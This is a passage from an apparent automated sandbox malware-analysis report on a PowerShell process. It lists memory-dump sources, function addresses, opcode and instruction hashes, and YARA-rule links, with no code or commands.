                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                  • Instruction ID: 46df0fcf678726a3a8c18cf474ff2dd04bc7607425c30963c59cf54c86bce1d0
                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                  • Instruction Fuzzy Hash: 4001677121CB0C4FD748EF0CE451AA6B7E0FB95364F50056EE58AC36A5DA36E882CB46
                                                                                  Function 00007FFD9B38414D Relevance: .0, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1917121954.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b380000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 824138cfee977e6a2d1cd154da6749558925fb5e494644809b4d82194a3defd4
                                                                                  • Instruction ID: 766119c72d4c9e8d4504342ffa96f6dddcbc2a9e9ced70a798920faba7a3b380
                                                                                  • Opcode Fuzzy Hash: 824138cfee977e6a2d1cd154da6749558925fb5e494644809b4d82194a3defd4
                                                                                  • Instruction Fuzzy Hash: E2F0BE32B0D9098FD7A9EA8CE4518A877E0EF5932071200BEE06DC75B7CA39EC40C781
                                                                                  Function 00007FFD9B384400 Relevance: .0, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1917121954.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b380000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cc3f3692379f78cb717980b45d381909af2cca6877a7dd52b67522caaa454766
                                                                                  • Instruction ID: 55f815a3181e6b08f6a0f1c4896c97bc8ced4ee608cc7a8674fce5bb5f454c83
                                                                                  • Opcode Fuzzy Hash: cc3f3692379f78cb717980b45d381909af2cca6877a7dd52b67522caaa454766
                                                                                  • Instruction Fuzzy Hash: 5AF0BE32A4D9488FD7A8EA8CE0608A877E0FF45324B4200FAE05DC74A7DA25AC40C741
                                                                                  Function 00007FFD9B3841D1 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1917121954.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b380000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction ID: 23b1db955046ec0e017dd8d049f1f892f8368d9f5ff0b372f3c075c81c4eac32
                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction Fuzzy Hash: 80E01A31B0C8088FDAB9EA8CE0519A973E1EB9832171201BFD14EC7971CA36ED518B81

                                                                                  Non-executed Functions

                                                                                  Function 00007FFD9B2B8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                                  • API String ID: 0-2350917820
                                                                                  • Opcode ID: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                                                                  • Instruction ID: b3f564df4f77b7ec7ef5020bf3105c6b904625b8002674d0995e4a096502a063
                                                                                  • Opcode Fuzzy Hash: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                                                                  • Instruction Fuzzy Hash: FC21F6B3B086259ACB1A3ABEB855DE87791DF5437834502F3E029DF193DD54A48B8A80